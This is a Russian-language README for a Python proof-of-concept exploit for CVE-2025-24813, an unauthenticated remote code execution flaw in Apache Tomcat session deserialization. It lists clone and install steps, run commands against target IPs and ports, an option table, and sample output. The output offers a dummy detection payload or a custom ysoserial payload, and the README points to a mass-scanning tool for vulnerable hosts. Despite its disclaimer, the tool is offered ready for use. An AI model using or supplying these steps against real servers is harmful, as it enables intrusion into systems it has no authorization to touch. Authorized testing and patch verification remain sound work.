
Эксплойт на Python (proof-of-concept) для CVE-2025-24813 - Неаутентифицированное удаленное выполнение кода (RCE) в Apache Tomcat (v9.0.0-9.0.98/10.1.0-10.1.34/11.0.0-11.0.2) через десериализацию вредоносных Java-объектов. Включает безопасный режим обнаружения и поддержку пользовательских полезных нагрузок (payload).
Эксплойт доказательства концепции для уязвимости десериализации Apache Tomcat (CVE-2025-24813). Этот инструмент демонстрирует, как злоумышленники могут использовать небезопасную десериализацию в управлении сессиями Tomcat.
ПРЕДУПРЕЖДЕНИЕ: Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированное использование против систем, которые вам не принадлежат, незаконно.
requestscoloramagit clone https://github.com/mattb709/CVE-2025-24813-PoC.git
cd CVE-2025-24813-PoC
pip install -r requirements.txt
Базовое использование:
python CVE-2025-24813-PoC.py -t 192.168.1.100 -p 8080
Расширенные параметры:
python CVE-2025-24813-PoC.py \
-t 10.0.0.1 \
-p 8443 \
--protocol https \
--no-verify \
--timeout 15
| Argument | Description | Required |
|---|---|---|
-t, --target | IP-адрес цели | Да |
-p, --port | Номер порта цели | Да |
--protocol | http или https (по умолчанию: http) | Нет |
--no-verify | Отключить проверку SSL-сертификата | Нет |
--timeout | Тайм-аут запроса в секундах (по умолчанию: 10) | Нет |
[*] Apache Tomcat CVE-2025-24813 Exploit PoC
[!] WARNING: For authorized testing only. Unauthorized use is illegal.
[*] Targeting http://192.168.1.100:8080
[*] Payload Options:
1. Use default dummy payload (safe, for detection)
2. Enter custom payload (hex-encoded, e.g., from ysoserial)
[?] Enter choice (1 or 2): 1
[*] Using default dummy payload.
[*] Attempting exploit...
[+] Success: Deserialization triggered (HTTP 500). Potential RCE if payload is malicious!
Для массового сканирования уязвимых систем:
🔍 CVE-2025-24813-Scanner - Инструмент массового обнаружения уязвимых хостов Tomcat
Если вы затронуты этой уязвимостью:
Это программное обеспечение предоставляется по лицензии MIT. Автор не несет ответственности за любое неправильное использование этого инструмента. Всегда получайте надлежащее разрешение перед тестированием систем.
Лицензия MIT - Подробности в файле LICENSE.